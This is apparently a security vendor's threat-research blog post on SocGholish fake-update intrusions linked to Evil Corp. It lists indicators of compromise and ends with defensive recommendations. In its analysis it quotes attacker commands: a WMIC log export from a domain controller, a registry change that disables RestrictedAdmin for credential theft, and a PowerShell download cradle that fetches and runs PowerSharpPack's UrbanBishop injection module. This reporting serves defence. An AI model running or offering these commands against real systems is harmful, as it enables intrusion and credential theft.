WEBINAR | A Deep-Dive into 2023 Cyber Threats
Reduce Alert Noise and False Positives
Boost your team's productivity by cutting down alert noise and false positives.
Automate Security Operations
Boost efficiency, reduce burnout, and better manage risk through automation.
Dark Web Monitoring
Online protection tuned to the need of your business.
Maximize Existing Security Investments
Improve efficiencies from existing investments in security tools.
Beyond MDR
Move your security operations beyond the limitations of MDR.
Secure with Microsoft 365 E5
Boost the power of Microsoft 365 E5 security.
Secure Multi-Cloud Environments
Improve cloud security and overcome complexity across multi-cloud environments.
Secure Mergers and Acquisitions
Control cyber risk for business acquisitions and dispersed business units.
Operational Technology
Solve security operations challenges affecting critical operational technology (OT) infrastructure.
Force-Multiply Your Security Operations
Whether you’re just starting your security journey, need to up your game, or you’re not happy with an existing service, we can help you to achieve your security goals.
Detection Investigation Response
Modernize Detection, Investigation, Response with a Security Operations Platform.
Threat Hunting
Locate and eliminate lurking threats with ReliaQuest GreyMatter
Threat Intelligence
Find cyber threats that have evaded your defenses.
Model Index
Security metrics to manage and improve security operations.
Breach and Attack Simulation
GreyMatter Verify is ReliaQuest’s automated breach and attack simulation capability.
Digital Risk Protection
Continuous monitoring of open, deep, and dark web sources to identify threats.
Phishing Analyzer
GreyMatter Phishing Analyzer removes the abuse mailbox management by automating the DIR process for you.
Integration Partners
The GreyMatter cloud-native Open XDR platform integrates with a fast-growing number of market-leading technologies.
Unify and Optimize Your Security Operations
ReliaQuest GreyMatter is a security operations platform built on an open XDR architecture and designed to help security teams increase visibility, reduce complexity, and manage risk across their security tools, including on-premises, clouds, networks, and endpoints.
Blog
Company Blog
Case Studies
Brands of the world trust ReliaQuest to achieve their security goals.
Data Sheets
Learn how to achieve your security outcomes faster with ReliaQuest GreyMatter.
eBooks
The latest security trends and perspectives to help inform your security operations.
Industry Guides and Reports
The latest security research and industry reports.
Podcasts
Catch up on the latest cybersecurity podcasts, and mindset moments from our very own mental performance coaches.
Solution Briefs
A deep dive on how ReliaQuest GreyMatter addresses security challenges.
White Papers
The latest white papers focused on security operations strategy, technology & insight.
Videos
Current and future SOC trends presented by our security experts.
Events & Webinars
Explore all upcoming company events, in-person and on-demand webinars
ReliaQuest ResourceCenter
From prevention techniques to emerging security trends, our comprehensive library can arm you with the tools you need to improve your security posture.
Threat Research
Get the latest threat analysis from the ReliaQuest Threat Research Team. ReliaQuest ShadowTalk Weekly podcast featuring discussions on the latest cybersecurity news and threat research.
Shadow Talk
ReliaQuest's ShadowTalk is a weekly podcast featuring discussions on the latest cybersecurity news and threat research. ShadowTalk's hosts come from threat intelligence, threat hunting, security research, and leadership backgrounds providing practical perspectives on the week's top cybersecurity stories.
April 25, 2024
About ReliaQuest
We bring our best attitude, energy and effort to everything we do, every day, to make security possible.
Leadership
Security is a team sport.
No Show Dogs Podcast
Mental Performance Coaches Derin McMains and Dr. Nicole Detling interview world-class performers across multiple industries.
Make It Possible
Make It Possible reflects our focus on bringing cybersecurity awareness to our communities and enabling the next generation of cybersecurity professionals.
Careers
Join our world-class team.
Press and Media Coverage
ReliaQuest newsroom covering the latest press release and media coverage.
Become a Channel Partner
When you partner with ReliaQuest, you help deliver world-class cybersecurity solutions.
Contact Us
How can we help you?
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We focus on four values every day to make security possible: being accountable, helpful, adaptable, and focused. These values drive development of our platform, relationships with our customers and partners, and further the ReliaQuest promise of security confidence across our customers and our own teams.
More results...
Editor’s note: Dean Murphy, Brandon Tirado, and Joseph Morales all contributed to this blog.
The “SocGholish” (aka FakeUpdates) malware distribution framework has presented a gripping tale of intrigue and suspense for ReliaQuest this year. Just in January, we’ve identified and responded to two discrete “hands-on-keyboard” intrusions traced back to a SocGholish compromise. We contained both intrusions by preventing what looked like the threat actor’s primary objective: deploying ransomware.
Think of SocGholish as, primarily, a preliminary foothold to provide access for additional cyber-crime groups. With these two intrusions, we found overlapping artifacts suggesting that the compromises are sourcing from the same threat actor. During our investigations network telemetry was found belonging to Evil Corp infrastructure, possibly indicating their involvement in this. Read on to find out what else we observed in this page-turner of an assessment.
Let’s start with a bit of story exposition. The SocGholish malware distribution network employs social engineering and drive-by compromise to drop malware on endpoints. It deceives individuals into downloading a fake update (as seen below) that contains an archive file with an embedded SocGholish JavaScript payload.
Once executed, the JavaScript payload establishes a command-and-control (C2) channel to relay system information it’s gathered from the compromised endpoint. If the host is found to be domain joined (a method companies use to manage Active Directory users), additional discovery commands are provided and executed to collect more details. If the endpoint and its host environment pique the interest of the threat actor operating the campaign, Cobalt Strike or similar frameworks are typically deployed for post-exploitation objectives.
Figure 1: SocGholish fake update link
Telemetry sources for our investigations into these events rely on information fed into GreyMatter by our customers. This gives us increased visibility, unifies disparate workflows, and allows quicker responses to active intrusions.
Learn more about GreyMatter >
A SocGholish compromise depends on user interaction. In the intrusions we tackled, we found evidence of users operating on our beachheads, interacting with a compromised domain belonging to a large transportation service company. (A beachhead refers to the original host that was compromised.) By inspecting its HTML DOM, we found that the site was loading JavaScript content hosted at “taxes[.]rpacx[.]com.”; HTML DOM represents the structure of the website. It was hosting the stage 2 SocGholish payload: the fake update.
taxes[.]rpacx[.]com.
Figure 2: SocGholish site details
Figure 3: SOCGholish HTML DOM
Once a site visitor initiated the download of the fake update, an archive file was dropped on the end user’s hard disk. And lurking in that file was a JavaScript payload, named “Update.js”. These intrusions were asynchronous, but similar payloads with the same naming convention were delivered from the same infrastructure.
When the user clicked on the JavaScript payload, Windows Script Host (wscript.exe) sprang into action to execute it. Execution of a payload established C2 with a stage 3 site. In these intrusions sets, the stage 3 sites were:
wscript.exe
*[.]signing[.]unitynotarypublic[.]com *[.]asset[.]tradingvein[.]xyz
*[.]signing[.]unitynotarypublic[.]com
*[.]asset[.]tradingvein[.]xyz
These connections were used to receive further instruction and relay the outputs of initial discovery commands staged in TXT files, located at the filepath AppData\Local\Temp\.
AppData\Local\Temp\
When reviewing the IP addresses hosting the stage 3 domains, we discovered another commonality. Both domains resolved to the same IP address: 88.119.169.108. The VirusTotal passive DNS entry for this IP address showed various subdomains being used.
We also found similar payloads tied to that IP address. We used the following VirusTotal intelligence query:
type:js AND name:update.js AND contacted_ip:88.119.169.108
The query revealed 12 JavaScript files that—based on the information above—we feel very confident are tied back to this larger SocGholish campaign.
Figure 4: VirusTotal Intelligence Query
Figure 5: Passive DNS replications for 88.119.169[.]108
Shortly after the initial compromises, the threat actor used the SocGholish C2 channels to transfer a Cobalt Strike HTTPS beacon to the compromised hosts. Intrusion set 1 showed that the HTTPS beacon established a C2 channel with the C2 server change-land[.]com (31.184.254[.]115). These were the initial signals identified by the ReliaQuest Threat Hunting team that prompted a response. As it turns out, the domain belongs to a cluster of infrastructure that we feel moderately confident is used by the notorious Evil Corp cyber-crime syndicate.
The remaining artifacts observed relate to Intrusion set 1. Due to a combination of a swift response and a dormant threat actor in Intrusion set 2, no additional post-exploitation initiatives were carried out following the HTTP beacon executing.
With the HTTPS beacon executing, additional information discovery efforts took place and enabled the threat actor to start attempting to move laterally. In this intrusion set, the threat actor seemed to favor an interactive session, making use of remote desktop protocol (RDP) and a valid admin account to pivot to a server on the network. Success led to even more discovery efforts from this endpoint. Of those discovery efforts, most were “textbook” ransomware affiliate operations, but one operation stood out.
The Windows Management Instrumentation Command-line (WMIC) was used to connect to a domain controller to execute this command:
"wmic /node:redacted.remote.host process call create 'wevtutil epl Security C:\\programdata\\redacted.evtx /q:Event[System[(EventID=4776)]]
This command uses wevtutil to retrieve the Windows Security Event ID 4776 (the domain controller attempted to validate the credentials for an account) logs from the domain controller and store the output within this drive: C:\programdata\redacted.evtx.
wevtutil
C:\programdata\redacted.evtx
Typically, we’ve observed wevtutil used for defense evasion, but something else seems afoot here; it was used for discovery objectives, although—at the time of writing—we haven’t found any other public reporting of this utility being used maliciously in this way.
The plotline ebbed a bit at this point, as activity ceased for roughly three days. It resumed with this attacker’s Windows binary of choice: WMIC, used to execute the following command to disable Windows RestrictedAdmin Mode.
process call create cmd /c reg add hklm\\System\\CurrentControlSet\\Control\\LSA /f /v disablerestrictedadmin /t REG_DWORD /d 0
This feature, when enabled, prevents credentials used to connect to a remote system via RDP from being stored in memory. With the attacker seen disabling RestrictedAdmin Mode on the endpoint they were operating on, we inferred that they were looking to intercept the credentials of those who would RDP to this device in the future. Access to the credential owners’ password hashes could help facilitate a “pass the hash” attack via RDP: stealing a “hashed” user credential to create a new user session on the same network.
On an adjacent host, we observed WMIC being used to execute a PowerShell download cradle; the following command was run to pull down and execute the UrbanBishop module of PowerSharpPack, which was hosted in a GitHub repository.
iex(newobjectnet.webclient).downloadstring ('https://raw.githubusercontent.com/ S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1') ; PowerSharpPack -UrbanBishop -Command '-i 9876 -p' CC:\programdata\ch.tmp'.
iex(newobjectnet.webclient).downloadstring
('https://raw.githubusercontent.com/
S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')
; PowerSharpPack -UrbanBishop -Command '-i 9876 -p' CC:\programdata\ch.tmp'.
The intent of this specific activity is strange, as previous evidence showed that the threat actor was making use of their Cobalt Strike HTTP beacon. Why the attacker decided to perform ingress tool transfer for an additional way to perform process injection has been inconclusive at this time.
And that’s the end of the saga; after this point, the intrusion was contained, and the threat actor evicted from the customer’s environment.
SocGholish is well practiced in such plotlines: disguising fake updates and tricking browser or system users into malicious downloads. In other words, don’t take it lightly. As demonstrated by the events above, a SocGholish infection can lead to a much more severe situation than just an infected endpoint. We’re highly confident that the attacker’s final objective was to deploy ransomware, based on their techniques, infrastructure ties to Evil Corp, and intelligence on previous intrusions that started with SocGholish.
The ReliaQuest GreyMatter security operations platform empowers customers to investigate, detect, and respond to the threats that matter most. The platform increases visibility to help you get the most out of your existing security investments and reduces the complexity of the DIR lifecycle. This ultimately allows ReliaQuest and our customers to efficiently counter known and emerging threats. We provide customers with detection capabilities and actionable intelligence to hinder the implications of a SocGholish infection. Here are some agnostic recommendations for any environment to help combat this threat:
Configure a GPO to set Notepad as the default application to open JavaScript files. This can help prevent the execution of JavaScript payloads if users click on them.
Ensure effective logging is in place to identify the initial compromise and any subsequent implications. This telemetry should be shipped to a centralized logging platform to enable detection capabilities.
Train staff to identify social engineering tactics employed on the web. SocGholish uses social engineering to prompt Internet users to download fraudulent browser or system upgrades.
taxes.rpacx[.]com
*.signing.unitynotarypublic[.]com
*.asset.tradingvein[.]xyz
88.119.169[.]108
change-land[.]com
31.184.254[.]115